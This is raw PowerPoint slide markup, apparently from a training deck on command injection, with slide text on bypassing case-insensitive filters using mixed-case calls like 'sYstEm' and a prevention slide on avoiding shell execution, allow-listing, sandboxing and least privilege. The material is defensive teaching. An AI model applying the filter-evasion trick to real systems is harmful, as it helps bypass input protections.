          <p:cNvPr id="29" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536019" y="6883122"/>
            <a:ext cx="13558361" cy="927973"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2476"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCFE"/>
          </a:solidFill>
          <a:ln w="22860">
            <a:solidFill>
              <a:srgbClr val="CFD2D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558879" y="6905982"/>
            <a:ext cx="612577" cy="882253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750332" y="7203519"/>
            <a:ext cx="229672" cy="287060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="7059097"/>
            <a:ext cx="1914287" cy="239316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Case Manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="7390209"/>
            <a:ext cx="12746950" cy="244912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploiting case-insensitive filters with mixed case like sYstEm</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20673" y="487680"/>
            <a:ext cx="6685478" cy="554236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="4350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Prevention: The Right Approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620673" y="1112758"/>
            <a:ext cx="3490912" cy="347663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Fortifying Your Defenses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>🛡️</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886658" y="2169676"/>
            <a:ext cx="6339721" cy="177284"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15006"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620673" y="1992392"/>
            <a:ext cx="531971" cy="531971"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 85945"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>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753666" y="2092166"/>
            <a:ext cx="265986" cy="332542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797957" y="2701647"/>
            <a:ext cx="3646408" cy="277058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Golden Rule: Avoid Shell Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797957" y="3085028"/>
            <a:ext cx="6251258" cy="567690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Never call OS commands with user-supplied data. Use language-native functions instead:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797957" y="3852148"/>
            <a:ext cx="6251258" cy="549831"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4839"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789146" y="3852148"/>
            <a:ext cx="6268879" cy="549831"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4839"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966430" y="3985141"/>
            <a:ext cx="5914311" cy="283845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>subprocess.run(['ping', '-c', '3', ip_address])</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7669768" y="1903690"/>
            <a:ext cx="6339840" cy="177284"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15006"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403783" y="1726406"/>
            <a:ext cx="531971" cy="531971"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 85945"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>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7536775" y="1826181"/>
            <a:ext cx="265986" cy="332542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581067" y="2435662"/>
            <a:ext cx="2216944" cy="277058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Strict Whitelisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581067" y="2819043"/>
            <a:ext cx="6251377" cy="567690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If commands are unavoidable, define a strict allow-list of acceptable input values. Reject everything not explicitly permitted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886658" y="5199817"/>
            <a:ext cx="6339721" cy="177284"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15006"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620673" y="5022533"/>
            <a:ext cx="531971" cy="531971"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 85945"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>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753666" y="5122307"/>
            <a:ext cx="265986" cy="332542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797957" y="5731788"/>
            <a:ext cx="2389108" cy="277058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Command Sandboxing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797957" y="6115169"/>
            <a:ext cx="6251258" cy="567690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Use containers, chroot environments, or tools that restrict command execution capabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7669768" y="4933831"/>
            <a:ext cx="6339840" cy="177284"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15006"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403783" y="4756547"/>
            <a:ext cx="531971" cy="531971"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 85945"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536775" y="4856321"/>
            <a:ext cx="265986" cy="332542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581067" y="5465802"/>
            <a:ext cx="2547342" cy="277058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Least Privilege Principle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581067" y="5849183"/>
            <a:ext cx="6251377" cy="283845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Run web servers with minimal permissions necessary for operation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886658" y="7259003"/>
            <a:ext cx="13123069" cy="283845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>"Trust no input. Whitelist, don't blacklist."</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620673" y="7059573"/>
            <a:ext cx="22860" cy="682704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3257B8"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>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848</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>106</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Roboto</vt:lpstr>
      <vt:lpstr>Roboto Slab</vt:lpstr>
